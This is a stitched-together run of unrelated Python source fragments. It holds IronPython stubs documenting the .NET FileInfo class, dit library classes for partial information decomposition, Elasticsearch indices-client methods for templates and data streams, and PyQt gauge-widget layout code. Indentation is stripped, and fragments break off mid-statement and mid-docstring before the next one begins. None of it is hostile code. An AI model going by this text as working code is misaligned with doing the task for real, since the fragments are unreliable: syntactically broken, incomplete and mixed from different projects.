"""Gets the name of a file that caused the System.IO.FileFormatException.
Get: SourceUri(self: FileFormatException) -> Uri
"""
class FileInfo(FileSystemInfo, ISerializable):
"""
Provides properties and instance methods for the creation, copying, deletion, moving, and opening of files, and aids in the creation of System.IO.FileStream objects. This class cannot be inherited.
FileInfo(fileName: str)
"""
def AppendText(self):
"""
AppendText(self: FileInfo) -> StreamWriter
Creates a System.IO.StreamWriter that appends text to the file represented by
this instance of the System.IO.FileInfo.
Returns: A new StreamWriter.
"""
pass
def CopyTo(self, destFileName, overwrite=None):
"""
CopyTo(self: FileInfo, destFileName: str, overwrite: bool) -> FileInfo
Copies an existing file to a new file, allowing the overwriting of an existing
file.
destFileName: The name of the new file to copy to.
overwrite: true to allow an existing file to be overwritten; otherwise, false.
Returns: A new file, or an overwrite of an existing file if overwrite is true. If the
file exists and overwrite is false, an System.IO.IOException is thrown.
CopyTo(self: FileInfo, destFileName: str) -> FileInfo
Copies an existing file to a new file, disallowing the overwriting of an
existing file.
destFileName: The name of the new file to copy to.
Returns: A new file with a fully qualified path.
"""
pass
def Create(self):
"""
Create(self: FileInfo) -> FileStream
Creates a file.
Returns: A new file.
"""
pass
def CreateText(self):
"""
CreateText(self: FileInfo) -> StreamWriter
Creates a System.IO.StreamWriter that writes a new text file.
Returns: A new StreamWriter.
"""
pass
def Decrypt(self):
"""
Decrypt(self: FileInfo)
Decrypts a file that was encrypted by the current account using the
System.IO.FileInfo.Encrypt method.
"""
pass
def Delete(self):
"""
Delete(self: FileInfo)
Permanently deletes a file.
"""
pass
def Encrypt(self):
"""
Encrypt(self: FileInfo)
Encrypts a file so that only the account used to encrypt the file can decrypt
it.
"""
pass
def GetAccessControl(self, includeSections=None):
"""
GetAccessControl(self: FileInfo, includeSections: AccessControlSections) -> FileSecurity
Gets a System.Security.AccessControl.FileSecurity object that encapsulates the
specified type of access control list (ACL) entries for the file described by
the current System.IO.FileInfo object.
includeSections: One of the System.Security.AccessControl.AccessControlSections values that
specifies which group of access control entries to retrieve.
Returns: A System.Security.AccessControl.FileSecurity object that encapsulates the
access control rules for the current file.
GetAccessControl(self: FileInfo) -> FileSecurity
Gets a System.Security.AccessControl.FileSecurity object that encapsulates the
access control list (ACL) entries for the file described by the current
System.IO.FileInfo object.
Returns: A System.Security.AccessControl.FileSecurity object that encapsulates the
access control rules for the current file.
"""
pass
def MemberwiseClone(self, *args): #cannot find CLR method
"""
MemberwiseClone(self: MarshalByRefObject, cloneIdentity: bool) -> MarshalByRefObject
Creates a shallow copy of the current System.MarshalByRefObject object.
cloneIdentity: false to delete the current System.MarshalByRefObject object's identity, which
will cause the object to be assigned a new identity when it is marshaled across
a remoting boundary. A value of false is usually appropriate. true to copy the
current System.MarshalByRefObject object's identity to its clone, which will
cause remoting client calls to be routed to the remote server object.
Returns: A shallow copy of the current System.MarshalByRefObject object.
MemberwiseClone(self: object) -> object
Creates a shallow copy of the current System.Object.
Returns: A shallow copy of the current System.Object.
"""
pass
def MoveTo(self, destFileName):
"""
MoveTo(self: FileInfo, destFileName: str)
Moves a specified file to a new location, providing the option to specify a new
file name.
destFileName: The path to move the file to, which can specify a different file name.
"""
pass
def Open(self, mode, access=None, share=None):
"""
Open(self: FileInfo, mode: FileMode, access: FileAccess, share: FileShare) -> FileStream
Opens a file in the specified mode with read, write, or read/write access and
the specified sharing option.
mode: A System.IO.FileMode constant specifying the mode (for example, Open or Append)
in which to open the file.
access: A System.IO.FileAccess constant specifying whether to open the file with Read,
Write, or ReadWrite file access.
share: A System.IO.FileShare constant specifying the type of access other FileStream
objects have to this file.
Returns: A System.IO.FileStream object opened with the specified mode, access, and
sharing options.
Open(self: FileInfo, mode: FileMode, access: FileAccess) -> FileStream
Opens a file in the specified mode with read, write, or read/write access.
mode: A System.IO.FileMode constant specifying the mode (for example, Open or Append)
in which to open the file.
access: A System.IO.FileAccess constant specifying whether to open the file with Read,
Write, or ReadWrite file access.
Returns: A System.IO.FileStream object opened in the specified mode and access, and
unshared.
Open(self: FileInfo, mode: FileMode) -> FileStream
Opens a file in the specified mode.
mode: A System.IO.FileMode constant specifying the mode (for example, Open or Append)
in which to open the file.
Returns: A file opened in the specified mode, with read/write access and unshared.
"""
pass
def OpenRead(self):
"""
OpenRead(self: FileInfo) -> FileStream
Creates a read-only System.IO.FileStream.
Returns: A new read-only System.IO.FileStream object.
"""
pass
def OpenText(self):
"""
OpenText(self: FileInfo) -> StreamReader
Creates a System.IO.StreamReader with UTF8 encoding that reads from an
existing text file.
"""
pass
"""
Classes implementing the partial information decomposition.
"""
from __future__ import division
from abc import ABCMeta, abstractmethod
from six import with_metaclass
from sys import version_info
from itertools import product
import networkx as nx
import numpy as np
import prettytable
from .lattice import ascendants, descendants, least_upper_bound, pid_lattice, sort_key
from .. import ditParams
from ..multivariate import coinformation
from ..utils import flatten, powerset
class BasePID(with_metaclass(ABCMeta, object)):
"""
This implements the basic Williams & Beer Partial Information Decomposition.
"""
_red_string = "I_r"
_pi_string = "pi"
def __init__(self, dist, inputs=None, output=None, reds=None, pis=None, **kwargs):
"""
Parameters
----------
dist : Distribution
The distribution to compute the decomposition on.
inputs : iter of iters, None
The set of input variables. If None, `dist.rvs` less indices
in `output` is used.
output : iter, None
The output variable. If None, `dist.rvs[-1]` is used.
reds : dict, None
Redundancy values pre-assessed.
pis : dict, None
Partial information values pre-assessed.
"""
self._dist = dist
if output is None:
output = dist.rvs[-1]
if inputs is None:
inputs = [var for var in dist.rvs if var[0] not in output]
self._inputs = tuple(map(tuple, inputs))
self._output = tuple(output)
self._kwargs = kwargs
self._lattice = pid_lattice(self._inputs)
self._total = coinformation(self._dist, [list(flatten(self._inputs)), self._output])
self._compute(reds, pis)
@staticmethod
@abstractmethod
def _measure(dist, node, output, **kwargs):
"""
Compute a redundancy value for `node`.
Parameters
----------
dist : Distribution
The distribution to compute the redundancy from.
node : tuple(tuples)
The lattice node to compute the redundancy of.
output : iterable
The indices to consider the target/output of the PID.
Returns
-------
red : float
The redundancy value.
"""
pass
@property
@abstractmethod
def _name(self):
"""
The name of the PID.
Returns
-------
name : str
The name.
"""
pass
def __eq__(self, other):
"""
Test if this and `other` are equal partial information decompositions.
Parameters
----------
other : BasePID
Returns
-------
eq : bool
If `self` and `other` are the same partial information decomposition.
"""
return all(np.isclose(self[node], other[node], atol=1e-5, rtol=1e-5) for node in self._lattice)
def __ne__(self, other):
"""
Test if this and `other` are not equal.
Parameters
----------
other : BasePID
Returns
-------
eq : bool
If `self` and `other` are different partial information decompositions.
"""
return not (self == other)
def __getitem__(self, key):
"""
Get the partial information value associated with `key`.
Parameters
----------
key : iterable of iterables
The node to get the partial information of.
Returns
-------
pi : float
The partial information associated with `key`.
"""
return float(self.get_partial(key))
def __repr__(self): # pragma: no cover
"""
Returns a representation of the PID.
Returns
-------
repr : str
A representation of this object.
"""
if ditParams['repr.print']:
return self.to_string()
else:
return super(BasePID, self).__repr__()
def __str__(self):
"""
Return a string representation of the PID.
Returns
-------
pid : str
The PID as a string.
"""
return self.to_string()
def _compute(self, reds=None, pis=None):
"""
Use the redundancy measure to populate the lattice.
"""
if reds is None: # pragma: no cover
reds = {}
if pis is None: # pragma: no cover
pis = {}
for node in self._lattice:
if node not in reds: # pragma: no branch
reds[node] = self._measure(self._dist, node, self._output, **self._kwargs)
reds, pis = self._compute_mobius_inversion(reds=reds, pis=pis)
nx.set_node_attributes(self._lattice, name='red', values=reds)
nx.set_node_attributes(self._lattice, name='pi', values=pis)
def _compute_mobius_inversion(self, reds=None, pis=None):
"""
Perform as much of a Mobius inversion as possible.
Parameters
----------
reds : dict
Currently known redundancy values.
pis : dict
Currently known partial information values.
Returns
-------
reds : dict
Updated redundancy values.
pis : dict
Updated partial information values.
"""
if reds is None: # pragma: no cover
reds = {}
if pis is None: # pragma: no cover
pis = {}
for node in reversed(list(nx.topological_sort(self._lattice))):
if node not in pis:
try:
pis[node] = reds[node] - sum(pis[n] for n in descendants(self._lattice, node))
except KeyError:
pass
return reds, pis
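# Note (added): this method is the Mobius inversion of the redundancy lattice,
# pi(node) = red(node) - sum(pi(n) for n strictly below node). Nodes are visited
# in reverse topological order so the needed sums are usually available; a node
# whose descendants' pi values are still unknown is skipped (the KeyError branch).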
def get_redundancy(self, node):
"""
Return the redundancy associated with `node`.
Parameters
----------
node : tuple of tuples
The node to get the redundancy for.
Returns
-------
red : float
The redundancy associated with `node`.
"""
return self._lattice.node[node]['red']
def get_partial(self, node):
"""
Return the partial information associated with `node`.
Parameters
----------
node : tuple of tuples
The node to get the partial information for.
Returns
-------
pi : float
The partial information associated with `node`.
"""
return self._lattice.node[node]['pi']
def to_string(self, digits=4):
"""
Create a table representing the redundancy and PI lattices.
Parameters
----------
digits : int
The number of digits of precision to display.
Returns
-------
table : str
The table of values.
"""
red_string = self._red_string
pi_string = self._pi_string
table = prettytable.PrettyTable([self.name, red_string, pi_string], title=getattr(self._dist, 'name', ''))
if ditParams['text.font'] == 'linechar': # pragma: no cover
try:
table.set_style(prettytable.BOX_CHARS)
except AttributeError:
pass
table.float_format[red_string] = '{}.{}'.format(digits + 2, digits)
table.float_format[pi_string] = '{}.{}'.format(digits + 2, digits)
for node in sorted(self._lattice, key=sort_key(self._lattice)):
node_label = ''.join('{{{}}}'.format(':'.join(map(str, n))) for n in node)
red_value = self.get_redundancy(node)
pi_value = self.get_partial(node)
if np.isclose(0, red_value, atol=10 ** -(digits - 1), rtol=10 ** -(digits - 1)): # pragma: no cover
red_value = 0.0
if np.isclose(0, pi_value, atol=10 ** -(digits - 1), rtol=10 ** -(digits - 1)): # pragma: no cover
pi_value = 0.0
table.add_row([node_label, red_value, pi_value])
return table.get_string()
@property
def name(self): # pragma: no cover
"""
Get the name of the decomposition. If colorama is available, the name will be styled
according to its properties.
Returns
-------
name : str
The name of the decomposition.
"""
try:
from colorama import Fore, Style
inconsistent_style = lambda x: Fore.RED + x + Style.RESET_ALL
negative_style = lambda x: Fore.GREEN + x + Style.RESET_ALL
incomplete_style = lambda x: Fore.BLUE + x + Style.RESET_ALL
except:
inconsistent_style = lambda x: x
negative_style = lambda x: x
incomplete_style = lambda x: x
if not self.consistent:
return inconsistent_style(self._name)
elif not self.nonnegative:
return negative_style(self._name)
elif not self.complete:
return incomplete_style(self._name)
else:
return self._name
@property
def consistent(self):
"""
Determine if the assignment of values to the lattice is self-consistent.
Returns
-------
valid : bool
True if the lattice is self-consistent, False otherwise.
"""
return True
@property
def nonnegative(self):
"""
Determine if the partial information values are all non-negative.
Returns
-------
nonnegative : bool
True if all pi values are non-negative, False otherwise.
"""
pis = nx.get_node_attributes(self._lattice, 'pi')
nonnegative = all(pi >= -1e-6 for pi in pis.values() if not np.isnan(pi))
return nonnegative
@property
def complete(self):
"""
Determine if all partial information values are assigned.
Returns
-------
valid : bool
True if all partial information values have been assigned, False otherwise.
"""
return True
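# Added usage sketch (assumes the `dit` package, where a concrete BasePID
# subclass such as dit.pid.PID_WB implements the Williams & Beer measure):
# import dit
# from dit.pid import PID_WB
# d = dit.Distribution(['000', '011', '101', '110'], [1 / 4] * 4)  # XOR
# print(PID_WB(d))  # inputs default to dist.rvs less the output, output to rvs[-1]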
class BaseIncompletePID(BasePID):
"""
A special PID class for measures which do not compute the redundancy of an arbitrary antichain.
Properties
----------
LATTICE_MONOTONICITY : bool
REDUCED_PID : bool
SELF_REDUNDANCY : bool
"""
LATTICE_MONOTONICITY = True
REDUCED_PID = True
SELF_REDUNDANCY = True
def __eq__(self, other):
"""
Test if this and `other` are equal partial information decompositions.
Parameters
----------
other : BasePID
Returns
-------
eq : bool
If `self` and `other` are the same partial information decomposition.
"""
equal_pi = super(BaseIncompletePID, self).__eq__(other)
equal_red = (np.isclose(self.get_redundancy(node), other.get_redundancy(node), atol=1e-5, rtol=1e-5) for node in self._lattice)
return equal_pi and all(equal_red)
def _compute_lattice_monotonicity(self, reds, pis):
"""
Infer the redundancy and partial information of lattice elements via lattice monotonicity.
Parameters
----------
reds : dict
Currently known redundancy values.
pis : dict
Currently known partial information values.
Returns
-------
reds : dict
Updated redundancy values.
pis : dict
Updated partial information values.
"""
# everything below a redundancy of 0 is a redundancy of 0
nodes = list(nx.topological_sort(self._lattice))
while nodes:
node = nodes.pop(0)
if node in reds and np.isclose(0, reds[node]):
for n in descendants(self._lattice, node):
if n not in reds:
reds[n] = 0
nodes.remove(n)
# everything above a redundancy of I(inputs, output) is I(inputs, output)
nodes = list(reversed(list(nx.topological_sort(self._lattice))))
while nodes:
node = nodes.pop(0)
if node in reds and np.isclose(reds[node], self._total):
for n in ascendants(self._lattice, node):
if n not in reds:
reds[n] = self._total
nodes.remove(n)
# if redundancy of A == redundancy of B, then for all A -> C -> B, redundancy of C = redundancy of A, B
tops = [node for node in self._lattice if node in reds and any((n not in reds) for n in self._lattice[node])]
bottoms
:arg explain: Return detailed information about the error
:arg ignore_unavailable: Whether specified concrete indices
should be ignored when unavailable (missing or closed)
:arg lenient: Specify whether format-based query failures (such
as providing text to a numeric field) should be ignored
:arg q: Query in the Lucene query string syntax
:arg rewrite: Provide a more detailed explanation showing the
actual Lucene query that will be executed.
"""
client, params = _deprecated_options(self, params)
return client._perform_request(
"POST",
_make_path(index, doc_type, "_validate", "query"),
params=params,
headers=headers,
body=body,
)
@query_params()
def create_data_stream(self, name, params=None, headers=None):
"""
Creates a data stream
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:arg name: The name of the data stream
"""
client, params = _deprecated_options(self, params)
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'name'.")
return client._perform_request(
"PUT", _make_path("_data_stream", name), params=params, headers=headers
)
@query_params("expand_wildcards")
def delete_data_stream(self, name, params=None, headers=None):
"""
Deletes a data stream.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:arg name: A comma-separated list of data streams to delete; use
`*` to delete all data streams
:arg expand_wildcards: Whether wildcard expressions should get
expanded to open or closed indices (default: open) Valid choices: open,
closed, hidden, none, all Default: open
"""
client, params = _deprecated_options(self, params)
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'name'.")
return client._perform_request(
"DELETE", _make_path("_data_stream", name), params=params, headers=headers
)
@query_params("master_timeout", "timeout")
def delete_index_template(self, name, params=None, headers=None):
"""
Deletes an index template.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:arg name: The name of the template
:arg master_timeout: Specify timeout for connection to master
:arg timeout: Explicit operation timeout
"""
client, params = _deprecated_options(self, params)
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'name'.")
return client._perform_request(
"DELETE",
_make_path("_index_template", name),
params=params,
headers=headers,
)
@query_params("flat_settings", "local", "master_timeout")
def get_index_template(self, name=None, params=None, headers=None):
"""
Returns an index template.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:arg name: A pattern that returned template names must match
:arg flat_settings: Return settings in flat format (default:
false)
:arg local: Return local information, do not retrieve the state
from master node (default: false)
:arg master_timeout: Explicit operation timeout for connection
to master node
"""
client, params = _deprecated_options(self, params)
return client._perform_request(
"GET", _make_path("_index_template", name), params=params, headers=headers
)
@query_params("cause", "create", "master_timeout")
def put_index_template(self, name, body, params=None, headers=None):
"""
Creates or updates an index template.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:arg name: The name of the template
:arg body: The template definition
:arg cause: User defined reason for creating/updating the index
template
:arg create: Whether the index template should only be added if
new or can also replace an existing one
:arg master_timeout: Specify timeout for connection to master
"""
client, params = _deprecated_options(self, params)
for param in (name, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return client._perform_request(
"PUT",
_make_path("_index_template", name),
params=params,
headers=headers,
body=body,
)
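# Added usage sketch (hypothetical template/stream names; assumes an
# elasticsearch-py client exposing these methods under `es.indices`):
# es.indices.put_index_template("logs-template", body={
#     "index_patterns": ["logs-*"],
#     "data_stream": {},
# })
# es.indices.create_data_stream("logs-app")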
@query_params("flat_settings", "local", "master_timeout")
def exists_index_template(self, name, params=None, headers=None):
"""
Returns information about whether a particular index template exists.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:arg name: The name of the template
:arg flat_settings: Return settings in flat format (default:
false)
:arg local: Return local information, do not retrieve the state
from master node (default: false)
:arg master_timeout: Explicit operation timeout for connection
to master node
"""
client, params = _deprecated_options(self, params)
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'name'.")
return client._perform_request(
"HEAD", _make_path("_index_template", name), params=params, headers=headers
)
@query_params("cause", "create", "master_timeout")
def simulate_index_template(self, name, body=None, params=None, headers=None):
"""
Simulate matching the given index name against the index templates in the
system
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:arg name: The name of the index (it must be a concrete index
name)
:arg body: New index template definition, which will be included
in the simulation, as if it already exists in the system
:arg cause: User defined reason for dry-run creating the new
template for simulation purposes
:arg create: Whether the index template we optionally defined in
the body should only be dry-run added if new or can also replace an
existing one
:arg master_timeout: Specify timeout for connection to master
"""
client, params = _deprecated_options(self, params)
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'name'.")
return client._perform_request(
"POST",
_make_path("_index_template", "_simulate_index", name),
params=params,
headers=headers,
body=body,
)
@query_params("expand_wildcards")
def get_data_stream(self, name=None, params=None, headers=None):
"""
Returns data streams.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:arg name: A comma-separated list of data streams to get; use
`*` to get all data streams
:arg expand_wildcards: Whether wildcard expressions should get
expanded to open or closed indices (default: open) Valid choices: open,
closed, hidden, none, all Default: open
"""
client, params = _deprecated_options(self, params)
return client._perform_request(
"GET", _make_path("_data_stream", name), params=params, headers=headers
)
@query_params("cause", "create", "master_timeout")
def simulate_template(self, body=None, name=None, params=None, headers=None):
"""
Simulate resolving the given template name or body
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:arg body: New index template definition to be simulated, if no
index template name is specified
:arg name: The name of the index template
:arg cause: User defined reason for dry-run creating the new
template for simulation purposes
:arg create: Whether the index template we optionally defined in
the body should only be dry-run added if new or can also replace an
existing one
:arg master_timeout: Specify timeout for connection to master
"""
client, params = _deprecated_options(self, params)
return client._perform_request(
"POST",
_make_path("_index_template", "_simulate", name),
params=params,
headers=headers,
body=body,
)
@query_params("expand_wildcards")
def resolve_index(self, name, params=None, headers=None):
"""
Returns information about any matching indices, aliases, and data streams
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-resolve-index-api.html>`_
:arg name: A comma-separated list of names or wildcard
expressions
:arg expand_wildcards: Whether wildcard expressions should get
expanded to open or closed indices (default: open) Valid choices: open,
closed, hidden, none, all Default: open
"""
client, params = _deprecated_options(self, params)
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'name'.")
return client._perform_request(
"GET", _make_path("_resolve", "index", name), params=params, headers=headers
)
@query_params(
"allow_no_indices",
"expand_wildcards",
"ignore_unavailable",
"master_timeout",
"timeout",
)
def add_block(self, index, block, params=None, headers=None):
"""
Adds a block to an index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/index-modules-blocks.html>`_
:arg index: A comma separated list of indices to add a block to
:arg block: The block to add (one of read, write, read_only or
metadata)
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes `_all`
string or when no indices have been specified)
:arg expand_wildcards: Whether to expand wildcard expression to
concrete indices that are open, closed or both. Valid choices: open,
closed, hidden, none, all Default: open
:arg ignore_unavailable: Whether specified concrete indices
should be ignored when unavailable (missing or closed)
:arg master_timeout: Specify timeout for connection to master
:arg timeout: Explicit operation timeout
"""
client, params = _deprecated_options(self, params)
for param in (index, block):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return client._perform_request(
"PUT", _make_path(index, "_block", block), params=params, headers=headers
)
@query_params()
def data_streams_stats(self, name=None, params=None, headers=None):
"""
Provides statistics on operations happening in a data stream.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:arg name: A comma-separated list of data stream names; use
`_all` or empty string to perform the operation on all data streams
"""
client, params = _deprecated_options(self, params)
return client._perform_request(
"GET",
_make_path("_data_stream", name, "_stats"),
params=params,
headers=headers,
)
@query_params()
def migrate_to_data_stream(self, name, params=None, headers=None):
"""
Migrates an alias to a data stream
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:arg name: The name of the alias to migrate
"""
client, params = _deprecated_options(self, params)
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'name'.")
return client._perform_request(
"POST",
_make_path("_data_stream", "_migrate", name),
params=params,
headers=headers,
)
@query_params()
def promote_data_stream(self, name, params=None, headers=None):
"""
Promotes a data stream from a replicated data stream managed by CCR to a
regular data stream
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:arg name: The name of the data stream
"""
client, params = _deprecated_options(self, params)
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'name'.")
return client._perform_request(
"POST",
_make_path("_data_stream", "_promote", name),
params=params,
headers=headers,
)
@query_params(
"allow_no_indices",
"expand_wildcards",
"flush",
"ignore_unavailable",
"run_expensive_tasks",
)
def disk_usage(self, index, params=None, headers=None):
"""
Analyzes the disk usage of each field of an index or data stream
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-disk-usage.html>`_
.. warning::
This API is **experimental** so may include breaking changes
or be removed in a future version.
# update the display
self._update_layout()
# central widget position property for bar type widgets
@property
def widget_position(self) -> ICWidgetPosition:
return None if self._central_widget is None else self._central_widget.position
@widget_position.setter
def widget_position(self, position: ICWidgetPosition) -> None:
if self._central_widget is None:
return
# this property is only for bar type widgets
if self.__container_type in (ICLinearContainerType.BAR, ICLinearContainerType.BAR_NO_TITLE, ICLinearContainerType.BAR_NO_VALUE,
ICLinearContainerType.BAR_NO_TITLE_NO_VALUE):
# if same as the previous position then nothing to do
if self._central_widget.position == position:
return
# set the position of the central widget
self._central_widget.position = position
# set the scale bar position
scale_position = ICWidgetPosition.opposite(position)
self.scale_bar_one.position = scale_position
# change the position of the container.
self.position = position
# update the display
self._update_layout()
@property
def first_scale_bar(self) -> ICLinearAxis:
return self.scale_bar_one
@property
def second_scale_bar(self) -> ICLinearAxis:
return self.scale_bar_two
# get the color of the title
@property
def title_text_color(self) -> QtGui.QColor:
return self._title_color
# set the title color
@title_text_color.setter
def title_text_color(self, clr: QtGui.QColor) -> None:
self._title_color = clr
self._title_format_changed = True
self._title_update()
# get the color of the value text
@property
def value_text_color(self) -> QtGui.QColor:
return self._value_color
# set the value color
@value_text_color.setter
def value_text_color(self, clr: QtGui.QColor) -> None:
self._value_color = clr
self._value_format_changed = True
self._value_update()
# get the color of alarm text
@property
def alarm_colors(self) -> tuple[QtGui.QColor, QtGui.QColor]:
return self._error_back_color, self._error_text_color
# set the color of alarm text
@alarm_colors.setter
def alarm_colors(self, clrs: tuple[QtGui.QColor, QtGui.QColor]) -> None:
self._error_back_color = clrs[0]
self._error_text_color = clrs[1]
self._value_update()
# get the size of the title text
@property
def title_size(self) -> int:
return self._title_size
# set the size of the title text
@title_size.setter
def title_size(self, sz: int) -> None:
self._title_size = sz
self._title_format_changed = True
self._title_update()
# get the size of the value text
@property
def value_size(self) -> int:
return self._value_size
# set the size of the value text
@value_size.setter
def value_size(self, sz: int) -> None:
self._value_size = sz
self._value_format_changed = True
self._value_update()
# get the size of the unit text
@property
def unit_size(self) -> int:
return self._unit_size
# set the size of the unit text
@unit_size.setter
def unit_size(self, sz: int) -> None:
self._unit_size = sz
self._title_format_changed = True
self._value_format_changed = True
self._local_update()
# get the maximum width of the vertical gauge
@property
def vertical_gauge_width(self) -> int:
return self._maximum_vertical_width
# set the maximum width of the vertical gauge
@vertical_gauge_width.setter
def vertical_gauge_width(self, wd: int) -> None:
self._maximum_vertical_width = wd
if self.position.is_vertical():
self.setMaximumSize(self._maximum_vertical_width, QtWidgets.QWIDGETSIZE_MAX)
self._local_update()
# get the maximum height of the horizontal gauge
@property
def horizontal_gauge_height(self) -> int:
return self._maximum_horizontal_height
# set the maximum height of the horizontal gauge
@horizontal_gauge_height.setter
def horizontal_gauge_height(self, ht: int) -> None:
self._maximum_horizontal_height = ht
if self.position.is_horizontal():
self.setMaximumSize(QtWidgets.QWIDGETSIZE_MAX, self._maximum_horizontal_height)
self._local_update()
########################################################
# slots
########################################################
# handles the signal for value update
# @pyqtSlot(float)
def value_changed(self, val: float) -> None:
self.value = val
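# Added note (hypothetical signal name): any pyqtSignal(float) can be wired
# straight to this slot, e.g.
# source.reading_changed.connect(gauge.value_changed)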
########################################################
# subclass callback functions
########################################################
# called when layout has been changed. sub-classes can reimplement this to update themselves
def on_layout_update(self) -> None:
pass
# called when value has been changed. sub-classes can reimplement this to update themselves
def on_value_update(self, value: float) -> None:
pass
########################################################
# layout management functions
########################################################
# setup display for BAR type
def _update_layout_bar(self) -> None:
if self.position.is_horizontal():
self.setMaximumSize(QtWidgets.QWIDGETSIZE_MAX, self._maximum_horizontal_height)
else:
self.setMaximumSize(self._maximum_vertical_width, QtWidgets.QWIDGETSIZE_MAX)
# get the position map based on the scale bar position
scale_position = ICWidgetPosition.opposite(self.position)
pos_map = self.__container_map[scale_position]
# place the gauge
index = self._layout.indexOf(self._central_widget)
if index >= 0:
_ = self._layout.takeAt(index)
x = pos_map["gauge"]
self._layout.addWidget(self._central_widget, x[0], x[1], x[2], x[3])
# place the scale
if self.scale_bar_one is not None:
index = self._layout.indexOf(self.scale_bar_one)
if index >= 0:
_ = self._layout.takeAt(index)
x = pos_map["scale"]
self._layout.addWidget(self.scale_bar_one, x[0], x[1], x[2], x[3])
# place the title
if self.__container_type in (ICLinearContainerType.BAR, ICLinearContainerType.BAR_NO_VALUE):
index = self._layout.indexOf(self._title_display)
if index >= 0:
_ = self._layout.takeAt(index)
x = pos_map["title"]
self._layout.addWidget(self._title_display, x[0], x[1], x[2], x[3])
# place the value
if self.__container_type in (ICLinearContainerType.BAR, ICLinearContainerType.BAR_NO_TITLE):
index = self._layout.indexOf(self._value_display)
if index >= 0:
_ = self._layout.takeAt(index)
x = pos_map["value"]
self._layout.addWidget(self._value_display, x[0], x[1], x[2], x[3])
# setup display for PLOT type
def _update_layout_plot(self) -> None:
# place the plot
index = self._layout.indexOf(self._central_widget)
if index >= 0:
_ = self._layout.takeAt(index)
self._layout.addWidget(self._central_widget, 1, 1, 2, 2)
# place the first scale
if self.scale_bar_one is not None:
pos_map_one = self.__container_map[self.scale_bar_one.position]
index = self._layout.indexOf(self.scale_bar_one)
if index >= 0:
_ = self._layout.takeAt(index)
x = pos_map_one["scale"]
self._layout.addWidget(self.scale_bar_one, x[0], x[1], x[2], x[3])
# check if the second bar exists
if self.scale_bar_two is not None:
pos_map_two = self.__container_map[self.scale_bar_two.position]
# place the second scale
index = self._layout.indexOf(self.scale_bar_two)
if index >= 0:
_ = self._layout.takeAt(index)
x = pos_map_two["scale"]
self._layout.addWidget(self.scale_bar_two, x[0], x[1], x[2], x[3])
# place the title
if self.__container_type in (ICLinearContainerType.PLOT, ICLinearContainerType.PLOT_NO_VALUE):
index = self._layout.indexOf(self._title_display)
# place if it has not been placed
if index < 0:
self._layout.addWidget(self._title_display, 4, 1, 1, 1)
# place the value
if self.__container_type in (ICLinearContainerType.PLOT, ICLinearContainerType.PLOT_NO_TITLE):
index = self._layout.indexOf(self._value_display)
# place if it has not been placed
if index < 0:
self._layout.addWidget(self._value_display, 4, 2, 1, 1)
# setup display
def _update_layout(self) -> None:
if self.__container_type in (ICLinearContainerType.PLOT, ICLinearContainerType.PLOT_NO_TITLE, ICLinearContainerType.PLOT_NO_VALUE,
ICLinearContainerType.PLOT_NO_TITLE_NO_VALUE):
# update only if the central widget is set
if self._central_widget is None:
return
self._update_layout_plot()
else:
# update only if central widget is set
if self._central_widget is None:
return
self._update_layout_bar()
# notify the subclass about change in the layout
self.on_layout_update()
self.update()
# update title
def _title_update(self) -> None:
# nothing to do if hidden
if self.state == ICWidgetState.Hidden or self._title_display is None:
return
# set up the display style
if self._title_format_changed:
self._title_display.setStyleSheet("QLabel { background-color : " + ICDisplayConfig.QtColorToSting(self.background_color) + "; color : " +
ICDisplayConfig.QtColorToSting(self._title_color) + ";}")
self._title_format_changed = False
# update the text based on the state
if self.state in (ICWidgetState.Transparent, ICWidgetState.FrameOnly):
self._title_display.setText("<span style='font-size:" + "{}".format(self._title_size) + "pt;'>" + "</span><span style='font-size:" +
"{}".format(self._unit_size) + "pt;'></span>")
else:
if self._unit:
self._title_display.setText("<span style='font-size:" + "{}".format(self._title_size) + "pt;'>" + self._title +
"</span> <span style='font-size:" + "{}".format(self._unit_size) + "pt;'>(" + self._unit + ")</span>")
else:
self._title_display.setText("<span style='font-size:" + "{}".format(self._title_size) + "pt;'>" + self._title + "</span>")
# update the title
self._title_display.update()
# update value
def _value_update(self):
# nothing to do if hidden
if self.state == ICWidgetState.Hidden or self._value_display is None or self._central_widget is None:
return
# update the value based on widget visibility state
self._value_display.setAlignment(Qt.AlignCenter)
if self.state in (ICWidgetState.Transparent, ICWidgetState.FrameOnly):
# set background color and do not draw
self._value_display.setStyleSheet("QLabel { background-color : " + ICDisplayConfig.QtColorToSting(self.background_color) + "; color : " +
ICDisplayConfig.QtColorToSting(self._value_color) + "; border-radius : 5px;}")
self._value_display.setText("<span style='font-size:" + "{}".format(self._value_size) + "pt;'> </span> <span style='font-size:" +
"{}".format(self._unit_size) + "pt;'></span>")
else:
# change if alarm status changed or format changed
